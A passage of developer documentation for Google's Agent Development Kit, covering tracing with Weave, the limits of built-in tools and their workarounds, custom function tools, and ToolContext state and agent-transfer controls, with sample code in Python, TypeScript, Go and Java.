importing/using ADK trace.set_tracer_provider(tracer_provider) # Define a simple tool for demonstration def calculator(a: float, b: float) -> str: """Add two numbers and return the result. Args: a: First number b: Second number Returns: The sum of a and b """ return str(a + b) calculator_tool = FunctionTool(func=calculator) # Create an LLM agent root_agent = LlmAgent( name="MathAgent", model="gemini-2.0-flash-exp", instruction=( "You are a helpful assistant that can do math. " "When asked a math problem, use the calculator tool to solve it." ), tools=[calculator_tool], ) ``` ## View Traces in Weave dashboard Once the agent runs, all its traces are logged to the corresponding project on [the Weave dashboard](https://wandb.ai/home). You can view a timeline of calls that your ADK agent made during execution - ## Notes - **Environment Variables**: Ensure your environment variables are correctly set for both WandB and Google API keys. - **Project Configuration**: Replace `/` with your actual WandB entity and project name. - **Entity Name**: You can find your entity name by visiting your [WandB dashboard](https://wandb.ai/home) and checking the **Teams** field in the left sidebar. - **Tracer Provider**: It's critical to set the global tracer provider before using any ADK components to ensure proper tracing. By following these steps, you can effectively integrate Google ADK with Weave, enabling comprehensive logging and visualization of your AI agents' model calls, tool invocations, and reasoning processes. ## Resources - **[Send OpenTelemetry Traces to Weave](https://weave-docs.wandb.ai/guides/tracking/otel)** - Comprehensive guide on configuring OTEL with Weave, including authentication and advanced configuration options. - **[Navigate the Trace View](https://weave-docs.wandb.ai/guides/tracking/trace-tree)** - Learn how to effectively analyze and debug your traces in the Weave UI, including understanding trace hierarchies and span details. - **[Weave Integrations](https://weave-docs.wandb.ai/guides/integrations/)** - Explore other framework integrations and see how Weave can work with your entire AI stack. # Limitations for ADK tools Some ADK tools have limitations that can impact how you implement them within an agent workflow. This page lists these tool limitations and workarounds, if available. ## One tool per agent limitation ONLY for Search in ADK Python v1.15.0 and lower This limitation only applies to the use of Google Search and Vertex AI Search tools in ADK Python v1.15.0 and lower. ADK Python release v1.16.0 and higher provides a built-in workaround to remove this limitation. In general, you can use more than one tool in an agent, but use of specific tools within an agent excludes the use of any other tools in that agent. The following ADK Tools can only be used by themselves, without any other tools, in a single agent object: - [Code Execution](/adk-docs/tools/gemini-api/code-execution/) with Gemini API - [Google Search](/adk-docs/tools/gemini-api/google-search/) with Gemini API - [Vertex AI Search](/adk-docs/tools/google-cloud/vertex-ai-search/) For example, the following approach that uses one of these tools along with other tools, within a single agent, is ***not supported***: ```py root_agent = Agent( name="RootAgent", model="gemini-2.5-flash", description="Code Agent", tools=[custom_function], code_executor=BuiltInCodeExecutor() # <-- NOT supported when used with tools ) ``` ```java LlmAgent searchAgent = LlmAgent.builder() .model(MODEL_ID) .name("SearchAgent") .instruction("You're a specialist in Google Search") .tools(new GoogleSearchTool(), new YourCustomTool()) // <-- NOT supported .build(); ``` ### Workaround #1: AgentTool.create() method Supported in ADKPythonJava The following code sample demonstrates how to use multiple built-in tools or how to use built-in tools with other tools by using multiple agents: ```py from google.adk.tools.agent_tool import AgentTool from google.adk.agents import Agent from google.adk.tools import google_search from google.adk.code_executors import BuiltInCodeExecutor search_agent = Agent( model='gemini-2.0-flash', name='SearchAgent', instruction=""" You're a specialist in Google Search """, tools=[google_search], ) coding_agent = Agent( model='gemini-2.0-flash', name='CodeAgent', instruction=""" You're a specialist in Code Execution """, code_executor=BuiltInCodeExecutor(), ) root_agent = Agent( name="RootAgent", model="gemini-2.0-flash", description="Root Agent", tools=[AgentTool(agent=search_agent), AgentTool(agent=coding_agent)], ) ``` ```java import com.google.adk.agents.BaseAgent; import com.google.adk.agents.LlmAgent; import com.google.adk.tools.AgentTool; import com.google.adk.tools.BuiltInCodeExecutionTool; import com.google.adk.tools.GoogleSearchTool; import com.google.common.collect.ImmutableList; public class NestedAgentApp { private static final String MODEL_ID = "gemini-2.0-flash"; public static void main(String[] args) { // Define the SearchAgent LlmAgent searchAgent = LlmAgent.builder() .model(MODEL_ID) .name("SearchAgent") .instruction("You're a specialist in Google Search") .tools(new GoogleSearchTool()) // Instantiate GoogleSearchTool .build(); // Define the CodingAgent LlmAgent codingAgent = LlmAgent.builder() .model(MODEL_ID) .name("CodeAgent") .instruction("You're a specialist in Code Execution") .tools(new BuiltInCodeExecutionTool()) // Instantiate BuiltInCodeExecutionTool .build(); // Define the RootAgent, which uses AgentTool.create() to wrap SearchAgent and CodingAgent BaseAgent rootAgent = LlmAgent.builder() .name("RootAgent") .model(MODEL_ID) .description("Root Agent") .tools( AgentTool.create(searchAgent), // Use create method AgentTool.create(codingAgent) // Use create method ) .build(); // Note: This sample only demonstrates the agent definitions. // To run these agents, you'd need to integrate them with a Runner and SessionService, // similar to the previous examples. System.out.println("Agents defined successfully:"); System.out.println(" Root Agent: " + rootAgent.name()); System.out.println(" Search Agent (nested): " + searchAgent.name()); System.out.println(" Code Agent (nested): " + codingAgent.name()); } } ``` ### Workaround #2: bypass_multi_tools_limit Supported in ADKPythonJava ADK Python has a built-in workaround which bypasses this limitation for `GoogleSearchTool` and `VertexAiSearchTool` (use `bypass_multi_tools_limit=True` to enable it), as shown in the [built_in_multi_tools](https://github.com/google/adk-python/tree/main/contributing/samples/built_in_multi_tools). sample agent. Warning Built-in tools cannot be used within a sub-agent, with the exception of `GoogleSearchTool` and `VertexAiSearchTool` in ADK Python because of the workaround mentioned above. For example, the following approach that uses built-in tools within sub-agents is **not supported**: ```py url_context_agent = Agent( model='gemini-2.5-flash', name='UrlContextAgent', instruction=""" You're a specialist in URL Context """, tools=[url_context], ) coding_agent = Agent( model='gemini-2.5-flash', name='CodeAgent', instruction=""" You're a specialist in Code Execution """, code_executor=BuiltInCodeExecutor(), ) root_agent = Agent( name="RootAgent", model="gemini-2.5-flash", description="Root Agent", sub_agents=[ url_context_agent, coding_agent ], ) ``` ```java LlmAgent searchAgent = LlmAgent.builder() .model("gemini-2.5-flash") .name("SearchAgent") .instruction("You're a specialist in Google Search") .tools(new GoogleSearchTool()) .build(); LlmAgent codingAgent = LlmAgent.builder() .model("gemini-2.5-flash") .name("CodeAgent") .instruction("You're a specialist in Code Execution") .tools(new BuiltInCodeExecutionTool()) .build(); LlmAgent rootAgent = LlmAgent.builder() .name("RootAgent") .model("gemini-2.5-flash") .description("Root Agent") .subAgents(searchAgent, codingAgent) // Not supported, as the sub agents use built in tools. .build(); ``` # Custom Tools for ADK Supported in ADKPython v0.1.0Typescript v0.2.0Go v0.1.0Java v0.1.0 In an ADK agent workflow, Tools are programming functions with structured input and output that can be called by an ADK Agent to perform actions. ADK Tools function similarly to how you use a [Function Call](https://ai.google.dev/gemini-api/docs/function-calling) with Gemini or other generative AI models. You can perform various actions and programming functions with an ADK Tool, such as: - Querying databases - Making API requests: getting weather data, booking systems - Searching the web - Executing code snippets - Retrieving information from documents (RAG) - Interacting with other software or services [ADK Tools list](/adk-docs/tools/) Before building your own Tools for ADK, check out the **[ADK Tools list](/adk-docs/tools/)** for pre-built tools you can use with ADK Agents. ## What is a Tool? In the context of ADK, a Tool represents a specific capability provided to an AI agent, enabling it to perform actions and interact with the world beyond its core text generation and reasoning abilities. What distinguishes capable agents from basic language models is often their effective use of tools. Technically, a tool is typically a modular code component—**like a Python, Java, or TypeScript function**, a class method, or even another specialized agent—designed to execute a distinct, predefined task. These tasks often involve interacting with external systems or data. ### Key Characteristics **Action-Oriented:** Tools perform specific actions for an agent, such as searching for information, calling an API, or performing calculations. **Extends Agent capabilities:** They empower agents to access real-time information, affect external systems, and overcome the knowledge limitations inherent in their training data. **Execute predefined logic:** Crucially, tools execute specific, developer-defined logic. They do not possess their own independent reasoning capabilities like the agent's core Large Language Model (LLM). The LLM reasons about which tool to use, when, and with what inputs, but the tool itself just executes its designated function. ## How Agents Use Tools Agents leverage tools dynamically through mechanisms often involving function calling. The process generally follows these steps: 1. **Reasoning:** The agent's LLM analyzes its system instruction, conversation history, and user request. 1. **Selection:** Based on the analysis, the LLM decides on which tool, if any, to execute, based on the tools available to the agent and the docstrings that describes each tool. 1. **Invocation:** The LLM generates the required arguments (inputs) for the selected tool and triggers its execution. 1. **Observation:** The agent receives the output (result) returned by the tool. 1. **Finalization:** The agent incorporates the tool's output into its ongoing reasoning process to formulate the next response, decide the subsequent step, or determine if the goal has been achieved. Think of the tools as a specialized toolkit that the agent's intelligent core (the LLM) can access and utilize as needed to accomplish complex tasks. ## Tool Types in ADK ADK offers flexibility by supporting several types of tools: 1. **[Function Tools](/adk-docs/tools-custom/function-tools/):** Tools created by you, tailored to your specific application's needs. - **[Functions/Methods](/adk-docs/tools-custom/function-tools/#1-function-tool):** Define standard synchronous functions or methods in your code (e.g., Python def). - **[Agents-as-Tools](/adk-docs/tools-custom/function-tools/#3-agent-as-a-tool):** Use another, potentially specialized, agent as a tool for a parent agent. - **[Long Running Function Tools](/adk-docs/tools-custom/function-tools/#2-long-running-function-tool):** Support for tools that perform asynchronous operations or take significant time to complete. 1. **[Built-in Tools](/adk-docs/tools/built-in-tools/):** Ready-to-use tools provided by the framework for common tasks. Examples: Google Search, Code Execution, Retrieval-Augmented Generation (RAG). 1. **Third-Party Tools:** Integrate tools seamlessly from popular external libraries. Navigate to the respective documentation pages linked above for detailed information and examples for each tool type. ## Referencing Tool in Agent’s Instructions Within an agent's instructions, you can directly reference a tool by using its **function name.** If the tool's **function name** and **docstring** are sufficiently descriptive, your instructions can primarily focus on **when the Large Language Model (LLM) should utilize the tool**. This promotes clarity and helps the model understand the intended use of each tool. It is **crucial to clearly instruct the agent on how to handle different return values** that a tool might produce. For example, if a tool returns an error message, your instructions should specify whether the agent should retry the operation, give up on the task, or request additional information from the user. Furthermore, ADK supports the sequential use of tools, where the output of one tool can serve as the input for another. When implementing such workflows, it's important to **describe the intended sequence of tool usage** within the agent's instructions to guide the model through the necessary steps. ### Example The following example showcases how an agent can use tools by **referencing their function names in its instructions**. It also demonstrates how to guide the agent to **handle different return values from tools**, such as success or error messages, and how to orchestrate the **sequential use of multiple tools** to accomplish a task. ```py # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import asyncio from google.adk.agents import Agent from google.adk.tools import FunctionTool from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.genai import types APP_NAME="weather_sentiment_agent" USER_ID="user1234" SESSION_ID="1234" MODEL_ID="gemini-2.0-flash" # Tool 1 def get_weather_report(city: str) -> dict: """Retrieves the current weather report for a specified city. Returns: dict: A dictionary containing the weather information with a 'status' key ('success' or 'error') and a 'report' key with the weather details if successful, or an 'error_message' if an error occurred. """ if city.lower() == "london": return {"status": "success", "report": "The current weather in London is cloudy with a temperature of 18 degrees Celsius and a chance of rain."} elif city.lower() == "paris": return {"status": "success", "report": "The weather in Paris is sunny with a temperature of 25 degrees Celsius."} else: return {"status": "error", "error_message": f"Weather information for '{city}' is not available."} weather_tool = FunctionTool(func=get_weather_report) # Tool 2 def analyze_sentiment(text: str) -> dict: """Analyzes the sentiment of the given text. Returns: dict: A dictionary with 'sentiment' ('positive', 'negative', or 'neutral') and a 'confidence' score. """ if "good" in text.lower() or "sunny" in text.lower(): return {"sentiment": "positive", "confidence": 0.8} elif "rain" in text.lower() or "bad" in text.lower(): return {"sentiment": "negative", "confidence": 0.7} else: return {"sentiment": "neutral", "confidence": 0.6} sentiment_tool = FunctionTool(func=analyze_sentiment) # Agent weather_sentiment_agent = Agent( model=MODEL_ID, name='weather_sentiment_agent', instruction="""You are a helpful assistant that provides weather information and analyzes the sentiment of user feedback. **If the user asks about the weather in a specific city, use the 'get_weather_report' tool to retrieve the weather details.** **If the 'get_weather_report' tool returns a 'success' status, provide the weather report to the user.** **If the 'get_weather_report' tool returns an 'error' status, inform the user that the weather information for the specified city is not available and ask if they have another city in mind.** **After providing a weather report, if the user gives feedback on the weather (e.g., 'That's good' or 'I don't like rain'), use the 'analyze_sentiment' tool to understand their sentiment.** Then, briefly acknowledge their sentiment. You can handle these tasks sequentially if needed.""", tools=[weather_tool, sentiment_tool] ) async def main(): """Main function to run the agent asynchronously.""" # Session and Runner Setup session_service = InMemorySessionService() # Use 'await' to correctly create the session await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) runner = Runner(agent=weather_sentiment_agent, app_name=APP_NAME, session_service=session_service) # Agent Interaction query = "weather in london?" print(f"User Query: {query}") content = types.Content(role='user', parts=[types.Part(text=query)]) # The runner's run method handles the async loop internally events = runner.run(user_id=USER_ID, session_id=SESSION_ID, new_message=content) for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("Agent Response:", final_response) # Standard way to run the main async function if __name__ == "__main__": asyncio.run(main()) ``` ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { LlmAgent, FunctionTool, InMemoryRunner, isFinalResponse, stringifyContent } from "@google/adk"; import { z } from "zod"; import { Content, createUserContent } from "@google/genai"; /** * Retrieves the current weather report for a specified city. */ function getWeatherReport(params: { city: string }): Record { if (params.city.toLowerCase().includes("london")) { return { "status": "success", "report": "The current weather in London is cloudy with a " + "temperature of 18 degrees Celsius and a chance of rain.", }; } if (params.city.toLowerCase().includes("paris")) { return { "status": "success", "report": "The weather in Paris is sunny with a temperature of 25 " + "degrees Celsius.", }; } return { "status": "error", "error_message": `Weather information for '${params.city}' is not available.`, }; } /** * Analyzes the sentiment of a given text. */ function analyzeSentiment(params: { text: string }): Record { if (params.text.includes("cloudy") || params.text.includes("rain")) { return { "status": "success", "sentiment": "negative" }; } if (params.text.includes("sunny")) { return { "status": "success", "sentiment": "positive" }; } return { "status": "success", "sentiment": "neutral" }; } const weatherTool = new FunctionTool({ name: "get_weather_report", description: "Retrieves the current weather report for a specified city.", parameters: z.object({ city: z.string().describe("The city to get the weather for."), }), execute: getWeatherReport, }); const sentimentTool = new FunctionTool({ name: "analyze_sentiment", description: "Analyzes the sentiment of a given text.", parameters: z.object({ text: z.string().describe("The text to analyze the sentiment of."), }), execute: analyzeSentiment, }); const instruction = ` You are a helpful assistant that first checks the weather and then analyzes its sentiment. Follow these steps: 1. Use the 'get_weather_report' tool to get the weather for the requested city. 2. If the 'get_weather_report' tool returns an error, inform the user about the error and stop. 3. If the weather report is available, use the 'analyze_sentiment' tool to determine the sentiment of the weather report. 4. Finally, provide a summary to the user, including the weather report and its sentiment. `; const agent = new LlmAgent({ name: "weather_sentiment_agent", instruction: instruction, tools: [weatherTool, sentimentTool], model: "gemini-2.5-flash" }); async function main() { const runner = new InMemoryRunner({ agent: agent, appName: "weather_sentiment_app" }); await runner.sessionService.createSession({ appName: "weather_sentiment_app", userId: "user1", sessionId: "session1" }); const newMessage: Content = createUserContent("What is the weather in London?"); for await (const event of runner.runAsync({ userId: "user1", sessionId: "session1", newMessage: newMessage, })) { if (isFinalResponse(event) && event.content?.parts?.length) { const text = stringifyContent(event).trim(); if (text) { console.log(text); } } } } main(); ``` ```go // Copyright 2025 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package main import ( "context" "fmt" "log" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) type getWeatherReportArgs struct { City string `json:"city" jsonschema:"The city for which to get the weather report."` } type getWeatherReportResult struct { Status string `json:"status"` Report string `json:"report,omitempty"` } func getWeatherReport(ctx tool.Context, args getWeatherReportArgs) (getWeatherReportResult, error) { if strings.ToLower(args.City) == "london" { return getWeatherReportResult{Status: "success", Report: "The current weather in London is cloudy with a temperature of 18 degrees Celsius and a chance of rain."}, nil } if strings.ToLower(args.City) == "paris" { return getWeatherReportResult{Status: "success", Report: "The weather in Paris is sunny with a temperature of 25 degrees Celsius."}, nil } return getWeatherReportResult{}, fmt.Errorf("weather information for '%s' is not available.", args.City) } type analyzeSentimentArgs struct { Text string `json:"text" jsonschema:"The text to analyze for sentiment."` } type analyzeSentimentResult struct { Sentiment string `json:"sentiment"` Confidence float64 `json:"confidence"` } func analyzeSentiment(ctx tool.Context, args analyzeSentimentArgs) (analyzeSentimentResult, error) { if strings.Contains(strings.ToLower(args.Text), "good") || strings.Contains(strings.ToLower(args.Text), "sunny") { return analyzeSentimentResult{Sentiment: "positive", Confidence: 0.8}, nil } if strings.Contains(strings.ToLower(args.Text), "rain") || strings.Contains(strings.ToLower(args.Text), "bad") { return analyzeSentimentResult{Sentiment: "negative", Confidence: 0.7}, nil } return analyzeSentimentResult{Sentiment: "neutral", Confidence: 0.6}, nil } func main() { ctx := context.Background() model, err := gemini.NewModel(ctx, "gemini-2.0-flash", &genai.ClientConfig{}) if err != nil { log.Fatal(err) } weatherTool, err := functiontool.New( functiontool.Config{ Name: "get_weather_report", Description: "Retrieves the current weather report for a specified city.", }, getWeatherReport, ) if err != nil { log.Fatal(err) } sentimentTool, err := functiontool.New( functiontool.Config{ Name: "analyze_sentiment", Description: "Analyzes the sentiment of the given text.", }, analyzeSentiment, ) if err != nil { log.Fatal(err) } weatherSentimentAgent, err := llmagent.New(llmagent.Config{ Name: "weather_sentiment_agent", Model: model, Instruction: "You are a helpful assistant that provides weather information and analyzes the sentiment of user feedback. **If the user asks about the weather in a specific city, use the 'get_weather_report' tool to retrieve the weather details.** **If the 'get_weather_report' tool returns a 'success' status, provide the weather report to the user.** **If the 'get_weather_report' tool returns an 'error' status, inform the user that the weather information for the specified city is not available and ask if they have another city in mind.** **After providing a weather report, if the user gives feedback on the weather (e.g., 'That's good' or 'I don't like rain'), use the 'analyze_sentiment' tool to understand their sentiment.** Then, briefly acknowledge their sentiment. You can handle these tasks sequentially if needed.", Tools: []tool.Tool{weatherTool, sentimentTool}, }) if err != nil { log.Fatal(err) } sessionService := session.InMemoryService() runner, err := runner.New(runner.Config{ AppName: "weather_sentiment_agent", Agent: weatherSentimentAgent, SessionService: sessionService, }) if err != nil { log.Fatal(err) } session, err := sessionService.Create(ctx, &session.CreateRequest{ AppName: "weather_sentiment_agent", UserID: "user1234", }) if err != nil { log.Fatal(err) } run(ctx, runner, session.Session.ID(), "weather in london?") run(ctx, runner, session.Session.ID(), "I don't like rain.") } func run(ctx context.Context, r *runner.Runner, sessionID string, prompt string) { fmt.Printf("\n> %s\n", prompt) events := r.Run( ctx, "user1234", sessionID, genai.NewContentFromText(prompt, genai.RoleUser), agent.RunConfig{ StreamingMode: agent.StreamingModeNone, }, ) for event, err := range events { if err != nil { log.Fatalf("ERROR during agent execution: %v", err) } if event.Content.Parts[0].Text != "" { fmt.Printf("Agent Response: %s\n", event.Content.Parts[0].Text) } } } ``` ```java import com.google.adk.agents.BaseAgent; import com.google.adk.agents.LlmAgent; import com.google.adk.runner.Runner; import com.google.adk.sessions.InMemorySessionService; import com.google.adk.sessions.Session; import com.google.adk.tools.Annotations.Schema; import com.google.adk.tools.FunctionTool; import com.google.adk.tools.ToolContext; // Ensure this import is correct import com.google.common.collect.ImmutableList; import com.google.genai.types.Content; import com.google.genai.types.Part; import java.util.HashMap; import java.util.Locale; import java.util.Map; public class WeatherSentimentAgentApp { private static final String APP_NAME = "weather_sentiment_agent"; private static final String USER_ID = "user1234"; private static final String SESSION_ID = "1234"; private static final String MODEL_ID = "gemini-2.0-flash"; /** * Retrieves the current weather report for a specified city. * * @param city The city for which to retrieve the weather report. * @param toolContext The context for the tool. * @return A dictionary containing the weather information. */ public static Map getWeatherReport( @Schema(name = "city") String city, @Schema(name = "toolContext") ToolContext toolContext) { Map response = new HashMap<>(); if (city.toLowerCase(Locale.ROOT).equals("london")) { response.put("status", "success"); response.put( "report", "The current weather in London is cloudy with a temperature of 18 degrees Celsius and a" + " chance of rain."); } else if (city.toLowerCase(Locale.ROOT).equals("paris")) { response.put("status", "success"); response.put( "report", "The weather in Paris is sunny with a temperature of 25 degrees Celsius."); } else { response.put("status", "error"); response.put( "error_message", String.format("Weather information for '%s' is not available.", city)); } return response; } /** * Analyzes the sentiment of the given text. * * @param text The text to analyze. * @param toolContext The context for the tool. * @return A dictionary with sentiment and confidence score. */ public static Map analyzeSentiment( @Schema(name = "text") String text, @Schema(name = "toolContext") ToolContext toolContext) { Map response = new HashMap<>(); String lowerText = text.toLowerCase(Locale.ROOT); if (lowerText.contains("good") || lowerText.contains("sunny")) { response.put("sentiment", "positive"); response.put("confidence", 0.8); } else if (lowerText.contains("rain") || lowerText.contains("bad")) { response.put("sentiment", "negative"); response.put("confidence", 0.7); } else { response.put("sentiment", "neutral"); response.put("confidence", 0.6); } return response; } /** * Calls the agent with the given query and prints the final response. * * @param runner The runner to use. * @param query The query to send to the agent. */ public static void callAgent(Runner runner, String query) { Content content = Content.fromParts(Part.fromText(query)); InMemorySessionService sessionService = (InMemorySessionService) runner.sessionService(); Session session = sessionService .createSession(APP_NAME, USER_ID, /* state= */ null, SESSION_ID) .blockingGet(); runner .runAsync(session.userId(), session.id(), content) .forEach( event -> { if (event.finalResponse() && event.content().isPresent() && event.content().get().parts().isPresent() && !event.content().get().parts().get().isEmpty() && event.content().get().parts().get().get(0).text().isPresent()) { String finalResponse = event.content().get().parts().get().get(0).text().get(); System.out.println("Agent Response: " + finalResponse); } }); } public static void main(String[] args) throws NoSuchMethodException { FunctionTool weatherTool = FunctionTool.create( WeatherSentimentAgentApp.class.getMethod( "getWeatherReport", String.class, ToolContext.class)); FunctionTool sentimentTool = FunctionTool.create( WeatherSentimentAgentApp.class.getMethod( "analyzeSentiment", String.class, ToolContext.class)); BaseAgent weatherSentimentAgent = LlmAgent.builder() .model(MODEL_ID) .name("weather_sentiment_agent") .description("Weather Sentiment Agent") .instruction(""" You are a helpful assistant that provides weather information and analyzes the sentiment of user feedback **If the user asks about the weather in a specific city, use the 'get_weather_report' tool to retrieve the weather details.** **If the 'get_weather_report' tool returns a 'success' status, provide the weather report to the user.** **If the 'get_weather_report' tool returns an 'error' status, inform the user that the weather information for the specified city is not available and ask if they have another city in mind.** **After providing a weather report, if the user gives feedback on the weather (e.g., 'That's good' or 'I don't like rain'), use the 'analyze_sentiment' tool to understand their sentiment.** Then, briefly acknowledge their sentiment. You can handle these tasks sequentially if needed. """) .tools(ImmutableList.of(weatherTool, sentimentTool)) .build(); InMemorySessionService sessionService = new InMemorySessionService(); Runner runner = new Runner(weatherSentimentAgent, APP_NAME, null, sessionService); // Change the query to ensure the tool is called with a valid city that triggers a "success" // response from the tool, like "london" (without the question mark). callAgent(runner, "weather in paris"); } } ``` ## Tool Context For more advanced scenarios, ADK allows you to access additional contextual information within your tool function by including the special parameter `tool_context: ToolContext`. By including this in the function signature, ADK will **automatically** provide an **instance of the ToolContext** class when your tool is called during agent execution. The **ToolContext** provides access to several key pieces of information and control levers: - `state: State`: Read and modify the current session's state. Changes made here are tracked and persisted. - `actions: EventActions`: Influence the agent's subsequent actions after the tool runs (e.g., skip summarization, transfer to another agent). - `function_call_id: str`: The unique identifier assigned by the framework to this specific invocation of the tool. Useful for tracking and correlating with authentication responses. This can also be helpful when multiple tools are called within a single model response. - `function_call_event_id: str`: This attribute provides the unique identifier of the **event** that triggered the current tool call. This can be useful for tracking and logging purposes. - `auth_response: Any`: Contains the authentication response/credentials if an authentication flow was completed before this tool call. - Access to Services: Methods to interact with configured services like Artifacts and Memory. Note that you shouldn't include the `tool_context` parameter in the tool function docstring. Since `ToolContext` is automatically injected by the ADK framework *after* the LLM decides to call the tool function, it is not relevant for the LLM's decision-making and including it can confuse the LLM. ### **State Management** The `tool_context.state` attribute provides direct read and write access to the state associated with the current session. It behaves like a dictionary but ensures that any modifications are tracked as deltas and persisted by the session service. This enables tools to maintain and share information across different interactions and agent steps. - **Reading State**: Use standard dictionary access (`tool_context.state['my_key']`) or the `.get()` method (`tool_context.state.get('my_key', default_value)`). - **Writing State**: Assign values directly (`tool_context.state['new_key'] = 'new_value'`). These changes are recorded in the state_delta of the resulting event. - **State Prefixes**: Remember the standard state prefixes: - `app:*`: Shared across all users of the application. - `user:*`: Specific to the current user across all their sessions. - (No prefix): Specific to the current session. - `temp:*`: Temporary, not persisted across invocations (useful for passing data within a single run call but generally less useful inside a tool context which operates between LLM calls). ```py from google.adk.tools import ToolContext, FunctionTool def update_user_preference(preference: str, value: str, tool_context: ToolContext): """Updates a user-specific preference.""" user_prefs_key = "user:preferences" # Get current preferences or initialize if none exist preferences = tool_context.state.get(user_prefs_key, {}) preferences[preference] = value # Write the updated dictionary back to the state tool_context.state[user_prefs_key] = preferences print(f"Tool: Updated user preference '{preference}' to '{value}'") return {"status": "success", "updated_preference": preference} pref_tool = FunctionTool(func=update_user_preference) # In an Agent: # my_agent = Agent(..., tools=[pref_tool]) # When the LLM calls update_user_preference(preference='theme', value='dark', ...): # The tool_context.state will be updated, and the change will be part of the # resulting tool response event's actions.state_delta. ``` ```typescript import { ToolContext } from "@google/adk"; // Updates a user-specific preference. export function updateUserThemePreference( value: string, toolContext: ToolContext ): Record { const userPrefsKey = "user:preferences"; // Get current preferences or initialize if none exist const preferences = toolContext.state.get(userPrefsKey, {}) as Record; preferences["theme"] = value; // Write the updated dictionary back to the state toolContext.state.set(userPrefsKey, preferences); console.log( `Tool: Updated user preference ${userPrefsKey} to ${JSON.stringify(toolContext.state.get(userPrefsKey))}` ); return { status: "success", updated_preference: toolContext.state.get(userPrefsKey), }; // When the LLM calls updateUserThemePreference("dark"): // The toolContext.state will be updated, and the change will be part of the // resulting tool response event's actions.stateDelta. } ``` ```go import ( "fmt" "google.golang.org/adk/tool" ) type updateUserPreferenceArgs struct { Preference string `json:"preference" jsonschema:"The name of the preference to set."` Value string `json:"value" jsonschema:"The value to set for the preference."` } type updateUserPreferenceResult struct { UpdatedPreference string `json:"updated_preference"` } func updateUserPreference(ctx tool.Context, args updateUserPreferenceArgs) (*updateUserPreferenceResult, error) { userPrefsKey := "user:preferences" val, err := ctx.State().Get(userPrefsKey) if err != nil { val = make(map[string]any) } preferencesMap, ok := val.(map[string]any) if !ok { preferencesMap = make(map[string]any) } preferencesMap[args.Preference] = args.Value if err := ctx.State().Set(userPrefsKey, preferencesMap); err != nil { return nil, err } fmt.Printf("Tool: Updated user preference '%s' to '%s'\n", args.Preference, args.Value) return &updateUserPreferenceResult{ UpdatedPreference: args.Preference, }, nil } ``` ```java import com.google.adk.tools.FunctionTool; import com.google.adk.tools.ToolContext; // Updates a user-specific preference. public Map updateUserThemePreference(String value, ToolContext toolContext) { String userPrefsKey = "user:preferences:theme"; // Get current preferences or initialize if none exist String preference = toolContext.state().getOrDefault(userPrefsKey, "").toString(); if (preference.isEmpty()) { preference = value; } // Write the updated dictionary back to the state toolContext.state().put("user:preferences", preference); System.out.printf("Tool: Updated user preference %s to %s", userPrefsKey, preference); return Map.of("status", "success", "updated_preference", toolContext.state().get(userPrefsKey).toString()); // When the LLM calls updateUserThemePreference("dark"): // The toolContext.state will be updated, and the change will be part of the // resulting tool response event's actions.stateDelta. } ``` ### **Controlling Agent Flow** The `tool_context.actions` attribute in Python and TypeScript, `ToolContext.actions()` in Java, and `tool.Context.Actions()` in Go, holds an **EventActions** object. Modifying attributes on this object allows your tool to influence what the agent or framework does after the tool finishes execution. - **`skip_summarization: bool`**: (Default: False) If set to True, instructs the ADK to bypass the LLM call that typically summarizes the tool's output. This is useful if your tool's return value is already a user-ready message. - **`transfer_to_agent: str`**: Set this to the name of another agent. The framework will halt the current agent's execution and **transfer control of the conversation to the specified agent**. This allows tools to dynamically hand off tasks to more specialized agents. - **`escalate: bool`**: (Default: False) Setting this to True signals that the current agent cannot handle the request and should pass control up to its parent agent (if in a hierarchy). In a LoopAgent, setting **escalate=True** in a sub-agent's tool will terminate the loop. #### Example ```py # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from google.adk.agents import Agent from google.adk.tools import FunctionTool from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.adk.tools import ToolContext from google.genai import types APP_NAME="customer_support_agent" USER_ID="user1234" SESSION_ID="1234" def check_and_transfer(query: str, tool_context: ToolContext) -> str: """Checks if the query requires escalation and transfers to another agent if needed.""" if "urgent" in query.lower(): print("Tool: Detected urgency, transferring to the support agent.") tool_context.actions.transfer_to_agent = "support_agent" return "Transferring to the support agent..." else: return f"Processed query: '{query}'. No further action needed." escalation_tool = FunctionTool(func=check_and_transfer) main_agent = Agent( model='gemini-2.0-flash', name='main_agent', instruction="""You are the first point of contact for customer support of an analytics tool. Answer general queries. If the user indicates urgency, use the 'escalation_tool' tool.""", tools=[escalation_tool] ) support_agent = Agent( model='gemini-2.0-flash', name='support_agent', instruction="""You are the dedicated support agent. Mentioned you are a support handler and please help the user with their urgent issue.""" ) 